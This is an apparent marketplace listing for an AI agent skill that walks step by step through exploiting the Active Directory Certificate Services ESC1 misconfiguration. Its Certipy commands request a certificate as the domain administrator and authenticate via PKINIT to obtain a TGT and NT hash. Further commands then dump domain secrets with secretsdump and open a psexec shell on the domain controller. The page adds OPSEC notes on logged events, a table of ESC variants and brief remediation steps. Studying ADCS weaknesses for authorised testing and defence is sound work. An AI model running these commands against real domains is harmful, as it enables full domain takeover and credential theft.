AgentStack
SKILL verified Apache-2.0 Self-run

Adcs Esc1

skill-mingyiseclab-mingyi-atlas-adcs-esc1 · by MingyiSecLab

Exploit Active Directory Certificate Services ESC1 — vulnerable template allows arbitrary SAN, enabling user impersonation up to domain admin.

No reviews yet
0 installs
13 views
0.0% view→install

Install

$ agentstack add skill-mingyiseclab-mingyi-atlas-adcs-esc1

✓ scanned · ✓ verified — works with Claude Code, Cursor, and more.

Security review

✓ Passed

No issues found. Passed automated security review. · v0.1.0 How review works →

  • Prompt-injection patterns
  • Secret / credential exfiltration
  • Dangerous shell & filesystem operations
  • Untrusted network calls
  • Known-malicious package signatures

What it can access

  • Network access No
  • Filesystem access No
  • Shell / process execution No
  • Environment & secrets No
  • Dynamic code execution No

From automated source analysis of v0.1.0. “Used” means the capability is present in the source — more access means more to trust, not that it’s unsafe.

Are you the author of Adcs Esc1? Claim this listing to set pricing, connect Stripe payouts, and keep 70% of every sale.
Sign up to claim

About

ADCS ESC1 Exploitation

ESC1 is the most common ADCS misconfig: a certificate template with ENROLLEESUPPLIESSUBJECT set, allowing any enrollee to request a cert for any user. Pair with Client Authentication EKU → authenticate as that user via PKINIT → instant domain admin.

1. Enumerate templates

# Certipy (preferred)
certipy find -u USER@DOM -p 'PASS' -dc-ip DC_IP \
  -output /tmp/adcs -text -stdout > /tmp/adcs.txt

# Or check JSON
certipy find -u USER@DOM -p 'PASS' -dc-ip DC_IP -json \
  -output /tmp/adcs.json

Atlas ingest:

adcs_audit("/tmp/adcs.json")

2. Identify ESC1 candidates

A template is ESC1-vulnerable when ALL true:

  • Enrollment Rights includes a group the attacker is in (Domain Users / Authenticated Users is jackpot)
  • Client Authentication EKU or Smart Card Logon EKU or Any Purpose
  • Enrollee Supplies Subject flag set (CTFLAGENROLLEESUPPLIESSUBJECT)
  • Manager Approval disabled
  • Authorized Signatures Required is 0

certipy output marks these clearly:

[!] Vulnerabilities
        ESC1                                : 'DOMAIN\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication

3. Request the cert as Domain Admin

certipy req -u USER@DOM -p 'PASS' -ca CA_NAME \
  -target CA_FQDN -template VULNERABLE_TEMPLATE \
  -upn 'administrator@dom' \
  -dc-ip DC_IP \
  -out /tmp/admin.pfx

The magic is -upn administrator@dom — because ENROLLEESUPPLIESSUBJECT is set, the CA issues a cert with that UPN even though we're a regular user requesting it.

4. Authenticate as Domain Admin

PKINIT (cert → TGT):

certipy auth -pfx /tmp/admin.pfx -dc-ip DC_IP
# Output: TGT cached, NT hash printed

You get back:

  • A TGT in administrator.ccache (use w/ export KRB5CCNAME=...)
  • The NT hash of administrator (because PKINIT replies include the user's NT hash for legacy compat)

5. Operate as Domain Admin

With NT hash:

# DCSync
secretsdump.py -hashes :NT_HASH 'DOM/administrator@DC_IP' -just-dc

# Shell on DC
psexec.py -hashes :NT_HASH 'DOM/administrator@DC_IP'

# Or use the ccache TGT directly
export KRB5CCNAME=/tmp/administrator.ccache
smbclient.py -k -no-pass 'DC@DC_IP'

6. Promote

kg_add_node(kind="vulnerability", label="ADCS ESC1:  → DA",
            props={"severity":"critical","ca":"","template":""})
kg_add_node(kind="credential", label="administrator:NT_HASH")
kg_add_edge(src=, dst=, kind="grants")
kg_add_edge(src=, dst=, kind="compromises")

ESC variants quick-ref

| ESC | Misconfig | Sub-skill | |---|---|---| | ESC1 | Enrollee supplies subject + client auth EKU | THIS doc | | ESC2 | Any Purpose EKU template | similar to ESC1 | | ESC3 | Enrollment Agent template | needs ESC3 + ESC2 combo | | ESC4 | Vulnerable template ACL (GenericAll, WriteDacl) | edit template → ESC1 | | ESC5 | Vulnerable PKI object ACL | edit CA settings | | ESC6 | EDITF_ATTRIBUTESUBJECTALTNAME2 on CA | request as any user via SAN | | ESC7 | Vulnerable CA ACL (ManageCA, ManageCertificates) | approve denied req | | ESC8 | NTLM relay → AD CS web enrollment | coerce + relay | | ESC9 | UPN no security extension | low-priv → high-priv via S4U2self | | ESC10 | Weak certificate mapping (StrongCertificateBindingEnforcement=0) | UPN spoof | | ESC11 | NTLM relay to ICPR (RPC) | similar to ESC8 | | ESC13 | Cert template w/ OID linked to group → group membership manipulation | |

OPSEC

  • Certipy req generates event 4886 on the CA (cert issued)
  • PKINIT generates event 4768 on DC w/ certificate fields populated
  • Hard to suppress; rely on engagement being permitted to be loud here

CVSS

  • Any ESC1 reachable from low-priv user: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H = 9.0
  • ESC1 reachable from anonymous (rare): 10.0
  • ESC8 NTLM relay (different exploit, same outcome): 9.8

Defender remediation

# Disable the dangerous flag
certutil -dstemplate  | findstr msPKI-Certificate-Name-Flag
# Should NOT contain CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT (0x1)

# Fix via UI: Template properties → Subject Name tab → uncheck
# "Supply in the request"

Source & license

This open-source skill is cataloged on AgentStack and links to its original source — we do not rehost the code.

Install and usage instructions live in the source repository linked above.

Reviews

No reviews yet — be the first.

Versions

  • v0.1.0 Imported from the upstream source.